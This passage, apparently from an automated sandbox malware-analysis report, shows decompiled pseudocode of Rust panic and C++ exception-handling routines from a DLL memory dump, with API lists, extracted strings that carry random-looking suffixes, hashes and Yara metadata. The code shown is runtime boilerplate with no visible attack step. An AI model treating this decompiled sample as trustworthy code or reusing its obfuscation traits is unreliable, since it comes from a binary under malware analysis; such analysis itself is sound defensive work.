						_v124 = 0x6f27cd60;
						_v120 = 0x6f27d014;
						_v68 = 0x6f27da50;
						_v64 = 2;
						_v96 = 0;
						_v100 = 0;
						_v60 = 0;
						_v116 = _a4;
						_v112 = _t314;
						_t315 =  &_v68;
						_v80 =  &_v124;
						_v76 = E6F232640;
						_v52 =  &_v80;
						_v48 = 1;
						_t197 = E6F23D2A0( &_v100, __eflags);
						__eflags = _t197 - 3;
						if(_t197 == 3) {
							_v20 = 0;
							_v36 = _t315;
							 *((intOrPtr*)( *((intOrPtr*)(_t315 + 4))))( *_t315);
							_t348 = _t348 + 4;
							L12:
							_t340 = _v36;
							_t307 =  *(_t340 + 4);
							__eflags =  *(4 + _t307);
							if( *(4 + _t307) != 0) {
								HeapFree( *0x6f28adc8, 0, _t259);
							}
							_t197 = HeapFree( *0x6f28adc8, 0, _t340);
						}
						goto L17;
					}
					_t333 =  &_v68;
					_v68 = 0x6f27da14;
					_v64 = 1;
					_v60 = 0;
					_v52 = 0x6f27cd60;
					_v120 = 0;
					_v124 = 0;
					_v48 = 0;
					_t197 = E6F23D2A0( &_v124, __eflags);
					__eflags = _t197 - 3;
					if(_t197 != 3) {
						goto L17;
					} else {
						_v20 = 1;
						_v36 = _t333;
						 *((intOrPtr*)( *((intOrPtr*)(_t333 + 4))))( *_t333);
						_t348 = _t348 + 4;
						goto L12;
					}
				} else {
					_v132 = _t278;
					__imp__AcquireSRWLockShared(0x6f28adbc);
					_v144 = 0x6f28adbc;
					_v20 = 2;
					_v136 = _t268;
					_v140 = _t337;
					_t263 =  *((intOrPtr*)(_t337 + 0x10))(_t268);
					_t348 = _t348 + 4;
					_v36 = _t263;
					_v40 = _t314;
					_t197 = E6F23D1B0(_t268, _t337);
					_t337 = _v40;
					_t352 = _t197;
					if(_t197 != 0) {
						L18:
						__eflags =  *_t197 - 1;
						_t280 = 1;
						if( *_t197 <= 1) {
							_t198 =  *0x6f28adb0; // 0x0
							_t316 = _a8;
							__eflags = _t198 - 2;
							if(_t198 == 2) {
								_t280 = 0;
								goto L20;
							}
							__eflags = _t198 - 1;
							if(_t198 == 1) {
								_t280 = 4;
								goto L20;
							}
							__eflags = _t198;
							if(_t198 != 0) {
								goto L20;
							}
							E6F23D530(_t268,  &_v68, _t337, _t340);
							_t337 = _v40;
							_t251 = _v68;
							__eflags = _t251;
							if(_t251 != 0) {
								goto L69;
							}
							_t271 = 5;
							goto L87;
						}
						_t316 = _a8;
						goto L20;
					} else {
						E6F256EE0(_t268,  &M6F27D0E7, 0x46, _t352,  &_v68, 0x6f27d060, 0x6f27d1ac);
						_t348 = _t348 + 0xc;
						L62:
						asm("ud2");
						L63:
						_t281 = "Box<dyn Any><unnamed>thread \'\' panicked at \'\', ";
						_t204 = 0xc;
						L22:
						_v100 = _t281;
						_v96 = _t204;
						_t205 =  *0x6f28a044; // 0x0
						if(_t205 == 0) {
							_t285 = 0x6f28a044;
							_t205 = E6F242B10(_t268, 0x6f28a044, _t337, _t340);
						}
						_t197 = TlsGetValue(_t205);
						if(_t197 <= 1) {
							L43:
							_t206 =  *0x6f28a044; // 0x0
							__eflags = _t206;
							if(_t206 == 0) {
								_t285 = 0x6f28a044;
								_t206 = E6F242B10(_t268, 0x6f28a044, _t337, _t340);
							}
							_t197 = TlsGetValue(_t206);
							__eflags = _t197;
							if(_t197 == 0) {
								_t207 =  *0x6f28adc8; // 0x1310000
								__eflags = _t207;
								if(_t207 != 0) {
									L67:
									_t208 = HeapAlloc(_t207, 0, 0x10);
									__eflags = _t208;
									if(__eflags != 0) {
										 *_t208 = 0;
										 *(_t208 + 0xc) = 0x6f28a044;
										_t340 = _t208;
										_t209 =  *0x6f28a044; // 0x0
										__eflags = _t209;
										if(_t209 == 0) {
											_v36 = _t340;
											_t209 = E6F242B10(_t268, 0x6f28a044, _t337, _t340);
											_t340 = _v36;
										}
										_t197 = TlsSetValue(_t209, _t340);
										goto L76;
									}
									L68:
									_t251 = E6F256C30(_t268, 0x10, 4, _t337, _t340, __eflags);
									asm("ud2");
									L69:
									_t332 = _v60;
									_t303 = _v64;
									__eflags = _t332 - 4;
									if(_t332 == 4) {
										__eflags =  *_t251 - 0x6c6c7566;
										if( *_t251 != 0x6c6c7566) {
											L84:
											_t340 = 2;
											_t271 = 0;
											__eflags = 0;
											L85:
											__eflags = _t303;
											if(_t303 != 0) {
												HeapFree( *0x6f28adc8, 0, _t251);
											}
											L87:
											__eflags = _t271 - 5;
											_t316 = _a8;
											_t273 =  !=  ? _t340 : 1;
											_t280 =  !=  ? _t271 & 0x000000ff : 4;
											_t144 =  !=  ? _t340 : 1;
											_t268 =  *0x6f28adb0;
											 *0x6f28adb0 =  !=  ? _t340 : 1;
											L20:
											_v148 = _t316;
											_v128 = _t280;
											_t61 = _t337 + 0xc; // 0x6f243440
											_t199 =  *_t61;
											_v40 = _t199;
											_t200 =  *_t199(_v36);
											_t348 = _t348 + 4;
											_t318 = _t316 ^ 0x7ef2a91e | _t200 ^ 0xecc7bcf4;
											__eflags = _t318;
											if(__eflags != 0) {
												_t202 = _v40(_v36);
												_t348 = _t348 + 4;
												__eflags = _t318 ^ 0xe43a67d8 | _t202 ^ 0xbae7a625;
												if(__eflags != 0) {
													goto L63;
												}
												_t254 = _v36;
												_t281 =  *_t254;
												_t204 = _t254[2];
												goto L22;
											}
											_t255 = _v36;
											_t281 =  *_t255;
											_t204 = _t255[1];
											goto L22;
										}
										_t271 = 1;
										_t340 = 3;
										goto L85;
									}
									__eflags = _t332 - 1;
									if(_t332 != 1) {
										goto L84;
									}
									__eflags =  *_t251 - 0x30;
									if( *_t251 != 0x30) {
										goto L84;
									}
									_t271 = 4;
									_t340 = 1;
									goto L85;
								}
								_t207 = GetProcessHeap();
								__eflags = _t207;
								if(__eflags == 0) {
									goto L68;
								}
								 *0x6f28adc8 = _t207;
								goto L67;
							} else {
								_t340 = _t197;
								__eflags = _t197 - 1;
								if(_t197 != 1) {
									L76:
									_t282 =  *(_t340 + 8);
									__eflags =  *_t340;
									_t138 = _t340 + 4; // 0x4
									_t337 = _t138;
									 *_t340 = 1;
									 *(_t340 + 4) = 0;
									 *(_t340 + 8) = 0;
									if(__eflags != 0) {
										__eflags = _t282;
										if(__eflags != 0) {
											asm("lock dec dword [ecx]");
											if(__eflags == 0) {
												_t197 = E6F23C800(_t282);
											}
										}
									}
									goto L27;
								}
								_v84 = 0;
								_v36 = 0;
								_t213 = 0;
								__eflags = 0;
								goto L48;
							}
						} else {
							_t337 = _t197;
							if( *_t197 != 1) {
								goto L43;
							}
							_t337 = _t337 + 4;
							L27:
							if( *_t337 != 0) {
								E6F256EE0(_t268, "already borrowedC:tyampmimkkfvlytcfjjwzprktkelbfiygduxwusohmhocuefyyefupvncdqxnbdzpobcxrxttvayruifzxzewqpnxdhtoqxvhptxvtuswthpfrwnzpmyamwgyjpl", 0x10, __eflags,  &_v68, 0x6f27d050, 0x6f27d720);
								_t348 = _t348 + 0xc;
								goto L62;
							}
							 *_t337 = 0xffffffff;
							_t340 =  *(_t337 + 4);
							if(_t340 == 0) {
								_v36 = _t337;
								_v20 = 8;
								_t250 = E6F23C690(_t268, _t337, _t340);
								_t337 = _v36;
								_t340 = _t250;
								_t197 =  *(_t337 + 4);
								_t359 = _t197;
								if(_t359 != 0) {
									asm("lock dec dword [eax]");
									if(_t359 == 0) {
										_t285 =  *(_t337 + 4);
										_t197 = E6F23C800(_t285);
									}
								}
								 *(_t337 + 4) = _t340;
							}
							asm("lock inc dword [esi]");
							if(_t359 <= 0) {
								L17:
								asm("ud2");
								asm("ud2");
								goto L18;
							} else {
								 *_t337 =  *_t337 + 1;
								_v84 = _t340;
								_v36 = _t340;
								if(_t340 != 0) {
									_t212 =  *(_t340 + 0x10);
									__eflags = _t212;
									_t285 =  ==  ? _t212 : _t340 + 0x10;
									if(__eflags != 0) {
										L104:
										_t213 =  *_t285;
										_t285 =  *((intOrPtr*)(_t285 + 4)) - 1;
										L105:
										_v20 = 3;
										L48:
										_v124 = 0x6f27d8fc;
										_v120 = 4;
										_v72 = 0;
										_v88 = 0;
										_v92 = 0;
										_v116 = 0;
										_v20 = 3;
										_t323 =  !=  ? _t213 : "<unnamed>thread \'\' panicked at \'\', ";
										_t215 =  !=  ? _t285 : 9;
										_v80 =  !=  ? _t213 : "<unnamed>thread \'\' panicked at \'\', ";
										_t324 =  &_v124;
										_v76 =  !=  ? _t285 : 9;
										_v68 =  &_v80;
										_v64 = 0x6f23de50;
										_v60 =  &_v100;
										_v56 = 0x6f23de50;
										_v52 =  &_v148;
										_v48 = E6F23DE70;
										_v108 =  &_v68;
										_v104 = 3;
										if(E6F23D2A0( &_v92, _t213) == 3) {
											_v20 = 7;
											_v40 = _t324;
											 *((intOrPtr*)( *((intOrPtr*)(_t324 + 4))))( *_t324);
											_t348 = _t348 + 4;
											_t343 = _v40;
											_t300 =  *((intOrPtr*)(_t343 + 4));
											if( *((intOrPtr*)(_t300 + 4)) != 0) {
												_t248 =  *_t343;
												if( *((intOrPtr*)(_t300 + 8)) >= 9) {
													_t248 =  *(_t248 - 4);
												}
												HeapFree( *0x6f28adc8, 0, _t248);
											}
											HeapFree( *0x6f28adc8, 0, _t343);
										}
										_t269 = _v128;
										_t222 =  <  ? (_t269 + 0x000000fd & 0x000000ff) + 1 : 0;
										if(_t222 == 0) {
											__imp__AcquireSRWLockExclusive(0x6f28adac);
											_v68 = 0x6f27d2c0;
											_v64 = 1;
											_v152 = 0x6f28adac;
											_v41 = _t269;
											_v60 = 0;
											_v20 = 6;
											_v124 =  &_v41;
											_v120 = E6F23DEE0;
											_v52 =  &_v124;
											_v48 = 1;
											_t225 = E6F23D2A0( &_v92, __eflags);
											_t341 =  &_v68;
											__imp__ReleaseSRWLockExclusive(0x6f28adac);
											__eflags = _t225 - 3;
											if(__eflags != 0) {
												goto L95;
											}
											_v20 = 5;
											_v40 = _t341;
											 *((intOrPtr*)( *((intOrPtr*)(_t341 + 4))))( *_t341);
											_t348 = _t348 + 4;
											goto L90;
										} else {
											if(_t222 == 1) {
												L95:
												_t372 = _v36;
												if(_t372 != 0) {
													asm("lock dec dword [eax]");
													if(_t372 == 0) {
														E6F23C800(_v84);
													}
												}
												_t342 = _v140;
												_t338 = _v136;
												_t373 = _v72;
												if(_t373 != 0) {
													asm("lock dec dword [eax]");
													if(_t373 == 0) {
														E6F23DC20(_v72);
													}
												}
												__imp__ReleaseSRWLockShared(0x6f28adbc);
												_t374 = _v132 - 1;
												_v20 = 0xffffffff;
												if(_v132 > 1) {
													_v68 = 0x6f27da8c;
													_v64 = 1;
													_v60 = 0;
													_v52 = 0x6f27cd60;
													_v76 = 0;
													_v80 = 0;
													_v48 = 0;
													_t229 = E6F23D2A0( &_v80, _t374);
													_v120 =  &_v68;
													_v124 = _t229;
													E6F23D460( &_v124);
													asm("ud2");
													asm("ud2");
												}
												_t285 = _t338;
												E6F23D440(_t285, _t342);
												asm("ud2");
												goto L104;
											}
											 *0x6f28a040 = 0;
											_t368 =  *0x6f28a040;
											if( *0x6f28a040 == 0) {
												goto L95;
											}
											_t330 =  &_v68;
											_v68 = 0x6f27d96c;
											_v64 = 1;
											_v60 = 0;
											_v52 = 0x6f27cd60;
											_v48 = 0;
											_v20 = 3;
											if(E6F23D2A0( &_v92, _t368) != 3) {
												goto L95;
											}
											_v40 = _t330;
											_v20 = 4;
											 *((intOrPtr*)( *((intOrPtr*)(_t330 + 4))))( *_t330);
											_t348 = _t348 + 4;
											L90:
											_t296 =  *((intOrPtr*)(_v40 + 4));
											if( *((intOrPtr*)(_t296 + 4)) != 0) {
												_t238 =  *_v40;
												if( *((intOrPtr*)(_t296 + 8)) >= 9) {
													_t238 =  *(_t238 - 4);
												}
												HeapFree( *0x6f28adc8, 0, _t238);
											}
											HeapFree( *0x6f28adc8, 0, _v40);
											goto L95;
										}
									}
									_t213 = 0;
									goto L105;
								}
								_t213 = 0;
								goto L48;
							}
						}
					}
				}
			}

































































































                          0x6f23c897
                          0x6f23c89a
                          0x6f23c89e
                          0x6f23c8a5
                          0x6f23c8a6
                          0x6f23c8a8
                          0x6f23c8ad
                          0x6f23c8b0
                          0x6f23c8b2
                          0x6f23c8b3
                          0x6f23c8b4
                          0x6f23c8b5
                          0x6f23c8b6
                          0x6f23c8b7
                          0x6f23c8b8
                          0x6f23c8b9
                          0x6f23c8ba
                          0x6f23c8bb
                          0x6f23c8bc
                          0x6f23c8bd
                          0x6f23c8be
                          0x6f23c8bf
                          0x6f23c8c6
                          0x6f23c8cc
                          0x6f23c8cf
                          0x6f23c8d6
                          0x6f23c8dd
                          0x6f23c8e2
                          0x6f23c8e7
                          0x6f23c8f0
                          0x6f23c8f3
                          0x6f23c8f9
                          0x6f23c901
                          0x6f23c906
                          0x6f23c908
                          0x6f23c922
                          0x6f23c927
                          0x6f23c92a
                          0x6f23c92a
                          0x6f23c92e
                          0x6f23c931
                          0x6f23c934
                          0x6f23c936
                          0x6f23c9aa
                          0x6f23c9ad
                          0x6f23ca0a
                          0x6f23ca11
                          0x6f23ca1b
                          0x6f23ca22
                          0x6f23ca29
                          0x6f23ca2d
                          0x6f23ca34
                          0x6f23ca3b
                          0x6f23ca41
                          0x6f23ca44
                          0x6f23ca47
                          0x6f23ca4d
                          0x6f23ca54
                          0x6f23ca57
                          0x6f23ca5e
                          0x6f23ca63
                          0x6f23ca65
                          0x6f23ca6c
                          0x6f23ca74
                          0x6f23ca77
                          0x6f23ca79
                          0x6f23ca7c
                          0x6f23ca7c
                          0x6f23ca7f
                          0x6f23ca82
                          0x6f23ca86
                          0x6f23ca9c
                          0x6f23ca9c
                          0x6f23caaa
                          0x6f23caaa
                          0x00000000
                          0x6f23ca65
                          0x6f23c9b2
                          0x6f23c9b5
                          0x6f23c9bc
                          0x6f23c9c3
                          0x6f23c9ca
                          0x6f23c9d1
                          0x6f23c9d5
                          0x6f23c9dc
                          0x6f23c9e3
                          0x6f23c9e8
                          0x6f23c9ea
                          0x00000000
                          0x6f23c9f0
                          0x6f23c9f5
                          0x6f23c9fd
                          0x6f23ca00
                          0x6f23ca02
                          0x00000000
                          0x6f23ca02
                          0x6f23c93d
                          0x6f23c93d
                          0x6f23c945
                          0x6f23c94b
                          0x6f23c955
                          0x6f23c95c
                          0x6f23c963
                          0x6f23c969
                          0x6f23c96c
                          0x6f23c96f
                          0x6f23c972
                          0x6f23c975
                          0x6f23c97a
                          0x6f23c97d
                          0x6f23c97f
                          0x6f23cab3
                          0x6f23cab3
                          0x6f23cab6
                          0x6f23cab8
                          0x6f23cb8b
                          0x6f23cb90
                          0x6f23cb93
                          0x6f23cb96
                          0x6f23cd97
                          0x00000000
                          0x6f23cd97
                          0x6f23cb9c
                          0x6f23cb9f
                          0x6f23cd90
                          0x00000000
                          0x6f23cd90
                          0x6f23cba5
                          0x6f23cba7
                          0x00000000
                          0x00000000
                          0x6f23cbb0
                          0x6f23cbb5
                          0x6f23cbb8
                          0x6f23cbbb
                          0x6f23cbbd
                          0x00000000
                          0x00000000
                          0x6f23cbc3
                          0x00000000
                          0x6f23cbc3
                          0x6f23cabe
                          0x00000000
                          0x6f23c985
                          0x6f23c99d
                          0x6f23c9a2
                          0x6f23cdbe
                          0x6f23cdbe
                          0x6f23cdc0
                          0x6f23cdc0
                          0x6f23cdc5
                          0x6f23caf3
                          0x6f23caf3
                          0x6f23caf6
                          0x6f23caf9
                          0x6f23cb00
                          0x6f23cb02
                          0x6f23cb07
                          0x6f23cb07
                          0x6f23cb0d
                          0x6f23cb16
                          0x6f23cbf3
                          0x6f23cbf3
                          0x6f23cbf8
                          0x6f23cbfa
                          0x6f23cbfc
                          0x6f23cc01
                          0x6f23cc01
                          0x6f23cc07
                          0x6f23cc0d
                          0x6f23cc0f
                          0x6f23cdcf
                          0x6f23cdd4
                          0x6f23cdd6
                          0x6f23cde6
                          0x6f23cdeb
                          0x6f23cdf0
                          0x6f23cdf2
                          0x6f23ce32
                          0x6f23ce38
                          0x6f23ce3f
                          0x6f23ce41
                          0x6f23ce46
                          0x6f23ce48
                          0x6f23ce4f
                          0x6f23ce52
                          0x6f23ce57
                          0x6f23ce57
                          0x6f23ce5c
                          0x00000000
                          0x6f23ce5c
                          0x6f23cdf4
                          0x6f23cdfe
                          0x6f23ce03
                          0x6f23ce05
                          0x6f23ce05
                          0x6f23ce08
                          0x6f23ce0b
                          0x6f23ce0e
                          0x6f23ceb8
                          0x6f23cebe
                          0x6f23cec9
                          0x6f23cec9
                          0x6f23cece
                          0x6f23cece
                          0x6f23ced0
                          0x6f23ced0
                          0x6f23ced2
                          0x6f23cedd
                          0x6f23cedd
                          0x6f23cee2
                          0x6f23cee2
                          0x6f23ceed
                          0x6f23cef5
                          0x6f23cef8
                          0x6f23cefb
                          0x6f23cefb
                          0x6f23cefb
                          0x6f23cac1
                          0x6f23cac1
                          0x6f23cac7
                          0x6f23caca
                          0x6f23caca
                          0x6f23cad0
                          0x6f23cad3
                          0x6f23cad5
                          0x6f23cae3
                          0x6f23cae3
                          0x6f23cae5
                          0x6f23cbcd
                          0x6f23cbd0
                          0x6f23cbde
                          0x6f23cbe0
                          0x00000000
                          0x00000000
                          0x6f23cbe6
                          0x6f23cbe9
                          0x6f23cbeb
                          0x00000000
                          0x6f23cbeb
                          0x6f23caeb
                          0x6f23caee
                          0x6f23caf0
                          0x00000000
                          0x6f23caf0
                          0x6f23cec0
                          0x6f23cec2
                          0x00000000
                          0x6f23cec2
                          0x6f23ce14
                          0x6f23ce17
                          0x00000000
                          0x00000000
                          0x6f23ce1d
                          0x6f23ce20
                          0x00000000
                          0x00000000
                          0x6f23ce26
                          0x6f23ce28
                          0x00000000
                          0x6f23ce28
                          0x6f23cdd8
                          0x6f23cddd
                          0x6f23cddf
                          0x00000000
                          0x00000000
                          0x6f23cde1
                          0x00000000
                          0x6f23cc15
                          0x6f23cc15
                          0x6f23cc17
                          0x6f23cc1a
                          0x6f23ce62
                          0x6f23ce62
                          0x6f23ce65
                          0x6f23ce68
                          0x6f23ce68
                          0x6f23ce6b
                          0x6f23ce71
                          0x6f23ce78
                          0x6f23ce7f
                          0x6f23ce85
                          0x6f23ce87
                          0x6f23ce8d
                          0x6f23ce90
                          0x6f23ce96
                          0x6f23ce96
                          0x6f23ce90
                          0x6f23ce87
                          0x00000000
                          0x6f23ce7f
                          0x6f23cc20
                          0x6f23cc27
                          0x6f23cc2e
                          0x6f23cc2e
                          0x00000000
                          0x6f23cc2e
                          0x6f23cb1c
                          0x6f23cb1f
                          0x6f23cb21
                          0x00000000
                          0x00000000
                          0x6f23cb27
                          0x6f23cb2a
                          0x6f23cb2d
                          0x6f23cdb6
                          0x6f23cdbb
                          0x00000000
                          0x6f23cdbb
                          0x6f23cb33
                          0x6f23cb39
                          0x6f23cb3e
                          0x6f23cb40
                          0x6f23cb43
                          0x6f23cb4a
                          0x6f23cb4f
                          0x6f23cb52
                          0x6f23cb54
                          0x6f23cb57
                          0x6f23cb59
                          0x6f23cb5b
                          0x6f23cb5e
                          0x6f23cb60
                          0x6f23cb63
                          0x6f23cb63
                          0x6f23cb5e
                          0x6f23cb68
                          0x6f23cb68
                          0x6f23cb6b
                          0x6f23cb6e
                          0x6f23caaf
                          0x6f23caaf
                          0x6f23cab1
                          0x00000000
                          0x6f23cb74
                          0x6f23cb74
                          0x6f23cb78
                          0x6f23cb7b
                          0x6f23cb7e
                          0x6f23cea0
                          0x6f23cea6
                          0x6f23cea8
                          0x6f23ceab
                          0x6f23d062
                          0x6f23d062
                          0x6f23d067
                          0x6f23d068
                          0x6f23d068
                          0x6f23cc30
                          0x6f23cc37
                          0x6f23cc3e
                          0x6f23cc45
                          0x6f23cc4c
                          0x6f23cc50
                          0x6f23cc57
                          0x6f23cc5e
                          0x6f23cc65
                          0x6f23cc6d
                          0x6f23cc70
                          0x6f23cc76
                          0x6f23cc79
                          0x6f23cc7f
                          0x6f23cc85
                          0x6f23cc8c
                          0x6f23cc95
                          0x6f23cc9c
                          0x6f23cca2
                          0x6f23cca9
                          0x6f23ccac
                          0x6f23ccba
                          0x6f23ccc1
                          0x6f23ccc9
                          0x6f23cccc
                          0x6f23ccce
                          0x6f23ccd1
                          0x6f23ccd4
                          0x6f23ccdb
                          0x6f23ccdd
                          0x6f23cce3
                          0x6f23cce5
                          0x6f23cce5
                          0x6f23ccf1
                          0x6f23ccf1
                          0x6f23ccff
                          0x6f23ccff
                          0x6f23cd04
                          0x6f23cd15
                          0x6f23cd1a
                          0x6f23cf0b
                          0x6f23cf1a
                          0x6f23cf21
                          0x6f23cf28
                          0x6f23cf32
                          0x6f23cf35
                          0x6f23cf3c
                          0x6f23cf43
                          0x6f23cf49
                          0x6f23cf50
                          0x6f23cf53
                          0x6f23cf5a
                          0x6f23cf5f
                          0x6f23cf68
                          0x6f23cf6e
                          0x6f23cf71
                          0x00000000
                          0x00000000
                          0x6f23cf78
                          0x6f23cf80
                          0x6f23cf83
                          0x6f23cf85
                          0x00000000
                          0x6f23cd20
                          0x6f23cd23
                          0x6f23cfc0
                          0x6f23cfc3
                          0x6f23cfc5
                          0x6f23cfc7
                          0x6f23cfca
                          0x6f23cfcf
                          0x6f23cfcf
                          0x6f23cfca
                          0x6f23cfd7
                          0x6f23cfdd
                          0x6f23cfe3
                          0x6f23cfe5
                          0x6f23cfe7
                          0x6f23cfea
                          0x6f23cfef
                          0x6f23cfef
                          0x6f23cfea
                          0x6f23cff9
                          0x6f23cfff
                          0x6f23d003
                          0x6f23d00a
                          0x6f23d012
                          0x6f23d019
                          0x6f23d020
                          0x6f23d027
                          0x6f23d02e
                          0x6f23d032
                          0x6f23d039
                          0x6f23d040
                          0x6f23d048
                          0x6f23d04b
                          0x6f23d04e
                          0x6f23d053
                          0x6f23d055
                          0x6f23d055
                          0x6f23d057
                          0x6f23d05b
                          0x6f23d060
                          0x00000000
                          0x6f23d060
                          0x6f23cd2b
                          0x6f23cd31
                          0x6f23cd33
                          0x00000000
                          0x00000000
                          0x6f23cd3c
                          0x6f23cd3f
                          0x6f23cd46
                          0x6f23cd4d
                          0x6f23cd54
                          0x6f23cd5b
                          0x6f23cd62
                          0x6f23cd70
                          0x00000000
                          0x00000000
                          0x6f23cd7b
                          0x6f23cd7e
                          0x6f23cd86
                          0x6f23cd88
                          0x6f23cf88
                          0x6f23cf8b
                          0x6f23cf92
                          0x6f23cf9b
                          0x6f23cf9d
                          0x6f23cf9f
                          0x6f23cf9f
                          0x6f23cfab
                          0x6f23cfab
                          0x6f23cfbb
                          0x00000000
                          0x6f23cfbb
                          0x6f23cd1a
                          0x6f23ceb1
                          0x00000000
                          0x6f23ceb1
                          0x6f23cb84
                          0x00000000
                          0x6f23cb84
                          0x6f23cb6e
                          0x6f23cb16
                          0x6f23c97f

                          APIs
                            • Part of subcall function 6F23C8C0: AcquireSRWLockShared.KERNEL32(6F28ADBC), ref: 6F23C945
                          • HeapFree.KERNEL32(00000000,00000000), ref: 6F23CA9C
                          • HeapFree.KERNEL32(00000000,?), ref: 6F23CAAA
                          • TlsGetValue.KERNEL32(00000000), ref: 6F23CB0D
                          • HeapFree.KERNEL32(00000000,00000000), ref: 6F23CCF1
                          • HeapFree.KERNEL32(00000000,?), ref: 6F23CCFF
                          Strings
                          • Box<dyn Any><unnamed>thread '' panicked at '', , xrefs: 6F23CDC0
                          • Y3$o, xrefs: 6F23C8C5
                          • cannot access a Thread Local Storage value during or after destructionC:jhdokdvbachceydqtheqlppakhgzijyekeivcljjvbkvyjmwyqejgcsvnqcbhbexvfcyaikjiycwgbjpytkvctpgymeigmgnvityoxcirvtcevutdotfqbgtduf, xrefs: 6F23C90D, 6F23C988
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: FreeHeap$AcquireLockSharedValue
                          • String ID: Box<dyn Any><unnamed>thread '' panicked at '', $Y3$o$cannot access a Thread Local Storage value during or after destructionC:jhdokdvbachceydqtheqlppakhgzijyekeivcljjvbkvyjmwyqejgcsvnqcbhbexvfcyaikjiycwgbjpytkvctpgymeigmgnvityoxcirvtcevutdotfqbgtduf
                          • API String ID: 942675266-3254041949
                          • Opcode ID: d1d13b44cbcc0a4f0091ce1d45e95740c1d36f736ad2e3dc93f8cec9e13ba2a4
                          • Instruction ID: fb5ee25effc77a8fa5984d4594e745d0100bf0d37e1a2510227d807cb74e57bd
                          • Opcode Fuzzy Hash: d1d13b44cbcc0a4f0091ce1d45e95740c1d36f736ad2e3dc93f8cec9e13ba2a4
                          • Instruction Fuzzy Hash: C90243F1E0022E9BDB14CFA4C884B9EBBF2FF45715F10851AE415AB280DB75A916CF91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F24D036, Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 304COMMON
                          Download Yara Rule
                          C-Code - Quality: 64%
                          			E6F24D036(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
				signed char* _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void _v64;
				signed int _v68;
				char _v84;
				intOrPtr _v88;
				signed int _v92;
				intOrPtr _v100;
				void _v104;
				intOrPtr* _v112;
				signed char* _v184;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t202;
				signed int _t203;
				char _t204;
				signed int _t206;
				signed int _t208;
				signed char* _t209;
				signed int _t210;
				signed int _t211;
				signed int _t215;
				void* _t218;
				signed char* _t221;
				void* _t223;
				void* _t225;
				signed char _t229;
				signed int _t230;
				void* _t232;
				void* _t235;
				void* _t238;
				signed char _t245;
				signed int _t250;
				void* _t253;
				signed int* _t255;
				signed int _t256;
				intOrPtr _t257;
				signed int _t258;
				void* _t263;
				void* _t268;
				void* _t269;
				signed int _t273;
				signed char* _t274;
				intOrPtr* _t275;
				signed char _t276;
				signed int _t277;
				signed int _t278;
				intOrPtr* _t280;
				signed int _t281;
				signed int _t282;
				signed int _t287;
				signed int _t294;
				signed int _t295;
				signed int _t298;
				signed int _t300;
				signed char* _t301;
				signed int _t302;
				signed int _t303;
				signed int* _t305;
				signed char* _t308;
				signed int _t318;
				signed int _t319;
				signed int _t321;
				signed int _t330;
				void* _t332;
				void* _t334;
				void* _t335;
				void* _t336;
				void* _t337;

				_t300 = __edx;
				_push(_t319);
				_t305 = _a20;
				_v20 = 0;
				_v28 = 0;
				_t279 = E6F24DF98(_a8, _a16, _t305);
				_t335 = _t334 + 0xc;
				_v12 = _t279;
				if(_t279 < 0xffffffff || _t279 >= _t305[1]) {
					L66:
					_t202 = E6F24F563(_t274, _t279, _t300, _t305, _t319);
					asm("int3");
					_t332 = _t335;
					_t336 = _t335 - 0x38;
					_push(_t274);
					_t275 = _v112;
					__eflags =  *_t275 - 0x80000003;
					if( *_t275 == 0x80000003) {
						return _t202;
					} else {
						_push(_t319);
						_push(_t305);
						_t203 = E6F24CCF1(_t275, _t279, _t300, _t305, _t319);
						__eflags =  *(_t203 + 8);
						if( *(_t203 + 8) != 0) {
							__imp__EncodePointer(0);
							_t319 = _t203;
							_t223 = E6F24CCF1(_t275, _t279, _t300, 0, _t319);
							__eflags =  *((intOrPtr*)(_t223 + 8)) - _t319;
							if( *((intOrPtr*)(_t223 + 8)) != _t319) {
								__eflags =  *_t275 - 0xe0434f4d;
								if( *_t275 != 0xe0434f4d) {
									__eflags =  *_t275 - 0xe0434352;
									if( *_t275 != 0xe0434352) {
										_t215 = E6F24C537(_t300, 0, _t319, _t275, _a4, _a8, _a12, _a16, _a24, _a28);
										_t336 = _t336 + 0x1c;
										__eflags = _t215;
										if(_t215 != 0) {
											L83:
											return _t215;
										}
									}
								}
							}
						}
						_t204 = _a16;
						_v28 = _t204;
						_v24 = 0;
						__eflags =  *(_t204 + 0xc);
						if( *(_t204 + 0xc) > 0) {
							_push(_a24);
							E6F24C46A(_t275, _t279, 0, _t319,  &_v44,  &_v28, _a20, _a12, _t204);
							_t302 = _v40;
							_t337 = _t336 + 0x18;
							_t215 = _v44;
							_v20 = _t215;
							_v12 = _t302;
							__eflags = _t302 - _v32;
							if(_t302 >= _v32) {
								goto L83;
							}
							_t281 = _t302 * 0x14;
							__eflags = _t281;
							_v16 = _t281;
							do {
								_t282 = 5;
								_t218 = memcpy( &_v64,  *((intOrPtr*)( *_t215 + 0x10)) + _t281, _t282 << 2);
								_t337 = _t337 + 0xc;
								__eflags = _v64 - _t218;
								if(_v64 > _t218) {
									goto L82;
								}
								__eflags = _t218 - _v60;
								if(_t218 > _v60) {
									goto L82;
								}
								_t221 = _v48 + 0xfffffff0 + (_v52 << 4);
								_t287 = _t221[4];
								__eflags = _t287;
								if(_t287 == 0) {
									L80:
									__eflags =  *_t221 & 0x00000040;
									if(( *_t221 & 0x00000040) == 0) {
										_push(0);
										_push(1);
										E6F24CFB6(_t302, _t275, _a4, _a8, _a12, _a16, _t221, 0,  &_v64, _a24, _a28);
										_t302 = _v12;
										_t337 = _t337 + 0x30;
									}
									goto L82;
								}
